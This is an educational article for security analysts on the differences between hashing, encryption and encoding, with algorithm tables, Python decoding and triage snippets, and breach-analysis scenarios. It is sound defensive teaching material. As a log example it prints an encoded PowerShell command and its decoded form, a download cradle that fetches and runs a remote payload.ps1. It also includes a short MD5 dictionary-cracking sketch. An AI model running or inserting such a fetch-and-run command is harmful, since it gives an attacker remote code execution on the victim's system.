Hashing vs Encryption vs Encoding
Techniques: T1003, T1555
The critical differences between hashing, encryption, and encoding — algorithm comparisons, real-world use cases, breach analysis applications, and concepts every analyst must understand to interpret logs and talk to engineering teams.
The Three Concepts — Hashing, Encryption, Encoding
These three concepts are among the most commonly confused terms in security. Analysts who misuse them lose credibility with engineering teams and make mistakes in investigations. Each serves a fundamentally different purpose:
| Concept | Direction | Key Required? | Deterministic? | Reversible? | Purpose |
|---|---|---|---|---|---|
| Hashing | One-way | No | Yes (same input = same hash) | No (mathematically infeasible) | Integrity verification, password storage |
| Encryption | Two-way | Yes (symmetric or asymmetric) | Usually not (a random IV or nonce changes the ciphertext each time) | Yes (with the key) | Confidentiality |
| Encoding | Both directions | No | Yes (always) | Yes (trivial — anyone can decode) | Data format transformation |
The Critical Distinction
Hashing is a one-way mathematical function. You feed in data, you get a fixed-length digest. Given the digest, you cannot recover the original data (except by brute-forcing inputs and comparing). Example: password storage in /etc/shadow.
Encryption is a two-way function with a key. You feed in plaintext + key, you get ciphertext. Given the ciphertext + key, you recover the plaintext. Example: TLS, BitLocker, PGP.
Encoding is a format transformation. Base64, hex, and URL encoding change how data is represented. No secrecy is involved — encoding is not security. Analysts see encoded data (especially Base64) and mistake it for hash values or encrypted data. A Base64 string can be decoded in seconds with echo "cGFzc3dvcmQ=" | base64 -d.
Hashing — One-Way Integrity Verification
How Hashing Works
A hash function takes any input (a file, a password, a message) and produces a fixed-length output called a digest or hash value. The same input always produces the same output. Even a single bit change in the input produces a completely different hash (the avalanche effect).
Input: "password123"
SHA-256: ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f
Input: "Password123" (capital P)
SHA-256: 008c70392e3abfbd0fa47bbc2ed96aa99bd49e159727fcba0f2e6abeb3a9d601
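The avalanche effect can be checked directly. The following is a minimal sketch using Python's standard `hashlib`; the helper names `sha256_hex` and `differing_bits` are illustrative, not part of any library.

```python
import hashlib

def sha256_hex(text: str) -> str:
    """Return the SHA-256 digest of a UTF-8 string as 64 hex characters."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def differing_bits(hex_a: str, hex_b: str) -> int:
    """Count the bit positions at which two hex digests differ."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")

lower = sha256_hex("password123")
upper = sha256_hex("Password123")  # only the first letter changes

print(lower)
print(upper)
print(differing_bits(lower, upper), "of 256 bits differ")
```

For a well-behaved hash function, roughly half of the output bits should flip for any small change in the input, which is why two near-identical passwords produce digests with no visible relationship.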
Common Hash Algorithms — Comparison
| Algorithm | Digest Size | Security Status | Use Case |
|---|---|---|---|
| MD5 | 128 bits (32 hex chars) | Broken: collision attacks are practical (2008 rogue CA certificate, 2012 Flame malware) | Legacy compatibility only. Do not use for security. |
| SHA-1 | 160 bits (40 hex chars) | Broken — SHAttered attack (2017) demonstrated practical collision | Deprecated. Avoid in all security contexts. |
| SHA-256 | 256 bits (64 hex chars) | Secure | The current standard for file integrity, TLS certificates, and blockchain. Too fast to store passwords on its own, even with a salt; use bcrypt, scrypt, or Argon2id for that. |
| SHA-512 | 512 bits (128 hex chars) | Secure | Larger security margin than SHA-256. Often faster than SHA-256 on 64-bit CPUs that lack SHA hardware instructions. |
| SHA-3 | Variable (224/256/384/512) | Secure | Newest NIST standard. Different internal structure than SHA-2. Future-proofing. |
| bcrypt | 184 bits (60-character encoded string) | Secure | Designed for password hashing. Includes embedded salt and configurable work factor. Deliberately much slower than SHA-256, which is what you want for passwords. |
| scrypt | Variable | Secure | Password hashing designed to be memory-hard (resists GPU/ASIC cracking). |
| Argon2id | Variable | Secure (recommended by OWASP) | Winner of the 2015 Password Hashing Competition. Current best practice for password storage. Memory-hard, time-hard, parallelizable. |
Password Hashing — The Right Way
When investigating a credential theft, the first question is: were the passwords properly hashed?
Bad (reversible or trivial):
$ echo "cGFzc3dvcmQ=" | base64 -d
password
Base64 is not hashing. Finding Base64-encoded passwords in a breach dump means the site effectively stored them in plaintext.
Better but still wrong:
plaintext password → MD5 → 5f4dcc3b5aa765d61d8327deb882cf99
MD5 is fast. A single modern GPU can compute tens of billions of MD5 hashes per second, so running the RockYou wordlist against unsalted MD5 hashes takes seconds.
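To make the weakness concrete, here is a rough sketch of a dictionary attack against an unsalted MD5 hash. The `crack_md5` helper and the five-word list are hypothetical stand-ins; a real attack would use a GPU cracker and a wordlist with millions of entries.

```python
import hashlib

def crack_md5(target_hex: str, candidates):
    """Return the first candidate whose MD5 digest matches target_hex, else None."""
    target = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None

# Hypothetical stand-in for a real wordlist such as RockYou.
wordlist = ["123456", "qwerty", "letmein", "password", "dragon"]

print(crack_md5("5f4dcc3b5aa765d61d8327deb882cf99", wordlist))
```

Because the hash is unsalted, one pass over the wordlist tests every account in the dump at once: each candidate digest can be compared against all stolen hashes.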
Good:
plaintext password + unique salt + bcrypt → $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
The $2a$ prefix identifies bcrypt. 10 is the cost factor (2^10 rounds). The salt is embedded in the output. Each password gets a different salt, so precomputed rainbow tables are useless.
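The fields described above can be pulled apart with plain string handling. This is a sketch that assumes the standard 60-character layout (version, two-digit cost, 22-character salt, 31-character digest); `parse_bcrypt` and `BcryptParts` are illustrative names, and the code only splits the string, it does not verify a password.

```python
from typing import NamedTuple

class BcryptParts(NamedTuple):
    version: str  # e.g. "2a", "2b", "2y"
    cost: int     # work factor; key setup runs 2**cost iterations
    salt: str     # 22 characters in bcrypt's Base64 variant
    digest: str   # 31 characters in bcrypt's Base64 variant

def parse_bcrypt(value: str) -> BcryptParts:
    """Split a bcrypt hash string into its fields."""
    parts = value.split("$")
    # A well-formed string splits into ['', '2a', '10', '<53 chars>'].
    if len(parts) != 4 or parts[0] != "" or len(parts[3]) != 53:
        raise ValueError("not a bcrypt hash string")
    version, cost, payload = parts[1], int(parts[2]), parts[3]
    return BcryptParts(version, cost, payload[:22], payload[22:])

parsed = parse_bcrypt("$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy")
print(parsed.version, parsed.cost, 2 ** parsed.cost, parsed.salt)
```

In a breach investigation the cost field is the number worth reporting: each increment doubles the work an attacker must spend per guess.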
Identifying Hash Types in Breach Data
When you see a hash in a breach report, identify the algorithm by format:
| Format | Likely Algorithm | Length |
|---|---|---|
| $1$salt$hash | MD5-crypt (Unix) | Variable |
| $2a$ / $2b$ / $2y$ | bcrypt | 60 chars (includes cost + salt) |
| $5$ | SHA-256-crypt (Unix) | Variable |
| $6$ | SHA-512-crypt (Unix) | Variable |
| {MD5}base64hash | MD5 (OpenLDAP) | 24 Base64 chars |
| {SSHA}base64hash | Salted SHA-1 (LDAP) | Variable (Base64) |
| 32 hex characters | MD4 (NTLM), MD5, or MD2 | 32 hex chars |
| 40 hex characters | SHA-1 | 40 hex chars |
| 64 hex characters | SHA-256 | 64 hex chars |
| $argon2id$v=19$... | Argon2id | Variable |
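Tools like hashid and hash-identifier suggest candidate hash types from the format. Treat the result as a shortlist: a bare 32-character hex string, for example, cannot be told apart as MD5 or NTLM without knowing where it came from.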
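The format rules in the table can be approximated with a few regular expressions. The sketch below is not how hashid works internally; `guess_hash_type` and `HASH_PATTERNS` are hypothetical names, and the patterns cover only the formats listed above.

```python
import re

# (pattern, label) pairs checked in order; prefixed formats come first.
HASH_PATTERNS = [
    (re.compile(r"^\$2[aby]\$\d{2}\$"), "bcrypt"),
    (re.compile(r"^\$argon2id\$"), "Argon2id"),
    (re.compile(r"^\$1\$"), "MD5-crypt"),
    (re.compile(r"^\$5\$"), "SHA-256-crypt"),
    (re.compile(r"^\$6\$"), "SHA-512-crypt"),
    (re.compile(r"^\{SSHA\}"), "Salted SHA-1 (LDAP)"),
    (re.compile(r"^[0-9a-fA-F]{32}$"), "MD5, NTLM (MD4), or MD2"),
    (re.compile(r"^[0-9a-fA-F]{40}$"), "SHA-1"),
    (re.compile(r"^[0-9a-fA-F]{64}$"), "SHA-256"),
]

def guess_hash_type(value: str) -> str:
    """Return a likely algorithm label based on format alone, or 'unknown'."""
    value = value.strip()
    for pattern, label in HASH_PATTERNS:
        if pattern.search(value):
            return label
    return "unknown"

for sample in [
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy",
    "cGFzc3dvcmQ=",
]:
    print(sample[:20], "->", guess_hash_type(sample))
```

Length-only matches are guesses: other algorithms share the same digest sizes, so the label is a starting point for cracking-tool mode selection, not a conclusion.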
Encryption — Two-Way with a Key
Types of Encryption
Symmetric Encryption — Same key for encryption and decryption.
| Algorithm | Key Size | Security | Use Case |
|---|---|---|---|
| AES-128 | 128 bits | Secure | Disk encryption (BitLocker, FileVault), TLS, Wi-Fi (WPA2). Fast, hardware-accelerated on modern CPUs. |
| AES-256 | 256 bits | Secure | Largest AES key size. Required for TOP SECRET data under NSA Suite B (AES-128 was permitted up to SECRET). Slightly slower than AES-128. |
| ChaCha20 | 256 bits | Secure | Modern stream cipher. Often preferred over AES on devices without hardware AES acceleration, such as older mobile CPUs. Used in TLS 1.3, WireGuard, SSH. |
| DES | 56 bits | Broken | 56-bit keys can be brute-forced in < 24 hours. Do not use. |
| 3DES | 112 bits | Deprecated | Vulnerable to Sweet32 attack (2016). Do not use. |
| Blowfish | 32-448 bits | Weak (block size) | 64-bit block size makes it vulnerable to birthday attacks at ~32 GB data. Use AES instead. |
| Twofish | 128-256 bits | Secure | AES finalist. Less common but still secure. |
Asymmetric Encryption — Public/private key pair. Public key encrypts, private key decrypts.
| Algorithm | Key Size | Security | Use Case |
|---|---|---|---|
| RSA | 2048-4096 bits | Secure at 2048+ | TLS certificates, PGP, SSH (legacy). Slow — typically used to encrypt symmetric keys. |
| ECC | 256-521 bits | Secure | Modern alternative to RSA. Much smaller keys (256-bit ECC is roughly equivalent to 3072-bit RSA). Used in TLS 1.3, SSH (Ed25519), Bitcoin. |
| DSA | 1024-3072 bits | Deprecated | Old NIST standard. Signature algorithm only, not encryption. Largely replaced by ECDSA. |
| Diffie-Hellman | 2048+ bits | Secure (with proper groups) | Key exchange only — not encryption. Foundation of TLS key agreement. |
Real-World Encryption Examples
TLS — Transport Layer Security
- Client connects to https://
- Server sends its RSA or ECDSA certificate (signed by a CA)
- Client and server perform key exchange (ECDHE handshake)
- Result: a symmetric AES-256 or ChaCha20 session key shared between client and server
- All data encrypted for the duration of the session
Disk Encryption (BitLocker)
- Writes: data encrypted with AES-128/256 before writing to disk
- Reads: data decrypted from disk into memory
- Key: TPM-protected or recovery key
- Protects against: physical theft of the drive, cold boot attacks (partially), offline OS modification
PGP / Age
- File encrypted with symmetric key, symmetric key encrypted with recipient’s public key
- Only the recipient’s private key can decrypt the symmetric key, which decrypts the file
- Real-world: secure file transfer, encrypted email, Git commit signing
Encoding — Just a Format Change
Encoding is not security. It is a transformation between data formats so that binary data can be transmitted over text-based protocols or displayed safely in various contexts.
Common Encoding Schemes
| Scheme | Purpose | Example (output of “password”) |
|---|---|---|
| Base64 | Binary → ASCII for safe transmission over text protocols | cGFzc3dvcmQ= |
| Hex | Binary → hexadecimal representation | 70617373776f7264 |
| URL encoding | Special characters in URLs | passw%6Frd (o → %6F) |
| HTML entities | Prevent HTML injection | &lt;script&gt; for <script> |
| Unicode escapes | Escaping special Unicode characters | \u0070\u0061\u0073... |
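Each scheme in the table is available in Python's standard library, which makes it easy to confirm that none of them needs a key. The sketch below reproduces the table's examples; the variable names are illustrative.

```python
import base64
import html
import urllib.parse

text = "password"
raw = text.encode("utf-8")

b64 = base64.b64encode(raw).decode("ascii")            # Base64
hexed = raw.hex()                                      # hex
url_special = urllib.parse.quote("https://", safe="")  # URL encoding of : and /
html_safe = html.escape("<script>")                    # HTML entities
unicode_escaped = "".join(f"\\u{ord(ch):04x}" for ch in text)  # \uXXXX escapes

print(b64, hexed, url_special, html_safe, unicode_escaped, sep="\n")

# Every transformation reverses without any secret.
assert base64.b64decode(b64) == raw
assert bytes.fromhex(hexed) == raw
assert urllib.parse.unquote(url_special) == "https://"
assert html.unescape(html_safe) == "<script>"
```

The round-trip assertions at the end are the point: anyone holding the encoded value can recover the original, so encoding offers no confidentiality.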
What Analysts Commonly See
Base64 in logs: PowerShell commands are often Base64-encoded. -EncodedCommand followed by a Base64 string is an immediate escalation indicator.
powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=
Decode it:
echo 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=' | base64 -d | iconv -f UTF-16LE -t UTF-8
Result:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2/payload.ps1')
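The same decode can be scripted for bulk log triage. This is a minimal sketch in Python, relying on the fact that `-EncodedCommand` carries Base64 of UTF-16LE text; the function name `decode_encoded_command` is an illustrative choice.

```python
import base64

def decode_encoded_command(b64_text: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64_text, validate=True).decode("utf-16-le")

# The Base64 argument from the log line above.
encoded = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA="

print(decode_encoded_command(encoded))
```

The repeating `A` characters in the Base64 are a quick visual tell: they come from the zero byte that follows every ASCII character in UTF-16LE.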
Hex in memory dumps: Memory forensics tools display strings in hex. A string 65 78 70 6C 6F 72 65 72 in a memory dump decodes to “explorer” — useful for identifying process names.
URL encoding in proxy logs: %68%74%74%70%73%3A%2F%2F decodes to https:// — useful for identifying obfuscated URLs in proxy logs.
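Both decodes are one-liners in Python's standard library. A short sketch using the two examples above (variable names are illustrative):

```python
import urllib.parse

# Hex bytes as they appear in a memory dump; fromhex ignores the spaces.
hex_dump = "65 78 70 6C 6F 72 65 72"
process_name = bytes.fromhex(hex_dump).decode("ascii")

# Percent-encoded fragment from a proxy log.
url_fragment = "%68%74%74%70%73%3A%2F%2F"
decoded_url = urllib.parse.unquote(url_fragment)

print(process_name)
print(decoded_url)
```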
Putting It All Together — Analysts’ Quick Reference
Scenario: You Find JDJhJDEwJE5ROW5qOHVMT2lj... in a Data Breach Dump
- Check format. Base64-decoded, the string starts with $2a$ → bcrypt hash. Good: the password was properly hashed.
- If it looks like cGFzc3dvcmQ= and decodes to readable text → Base64. Not hashed: the site stored plaintext credentials encoded as Base64. Immediate escalation.
- If it looks like 5f4dcc3b5aa765d61d8327deb882cf99 (32 hex chars) → MD5 or NTLM. Weak and likely crackable, but at least the site stored a hash.
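The triage steps above can be sketched as a small function. The heuristics and the name `triage_credential` are illustrative assumptions, and the first sample uses only the visible prefix of the truncated string from the scenario heading.

```python
import base64
import binascii
import re

BCRYPT_PREFIXES = ("$2a$", "$2b$", "$2y$")

def triage_credential(value: str) -> str:
    """Classify a credential field from a breach dump (illustrative heuristics only)."""
    # Check hex first: a 32-char hex string is also syntactically valid Base64.
    if re.fullmatch(r"[0-9a-fA-F]{32}", value):
        return "32 hex chars: MD5 or NTLM, weak"
    if value.startswith(BCRYPT_PREFIXES):
        return "bcrypt hash"
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return "unknown"
    if decoded.startswith(BCRYPT_PREFIXES):
        return "Base64-wrapped bcrypt hash"
    if decoded.isprintable():
        return f"Base64-encoded plaintext: {decoded!r}"
    return "unknown"

for sample in [
    "JDJhJDEwJE5ROW5qOHVMT2lj",  # visible prefix of the scenario string only
    "cGFzc3dvcmQ=",
    "5f4dcc3b5aa765d61d8327deb882cf99",
]:
    print(sample, "->", triage_credential(sample))
```

Checking the hex pattern before attempting a Base64 decode matters because hex digits are a subset of the Base64 alphabet; reversing the order would misreport MD5 hashes as encoded binary.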
Scenario: You See an Encrypted Communication Log
- Protocol: TLS 1.3 with TLS_AES_256_GCM_SHA384 → strong. No payload visibility, but that’s expected.
- Protocol: TLS 1.0 with TLS_RSA_WITH_RC4_128_SHA → weak. Deprecated cipher suite needs remediation.
- If you see the plaintext in the log alongside the ciphertext → logging at the wrong layer. The application decrypted before logging.
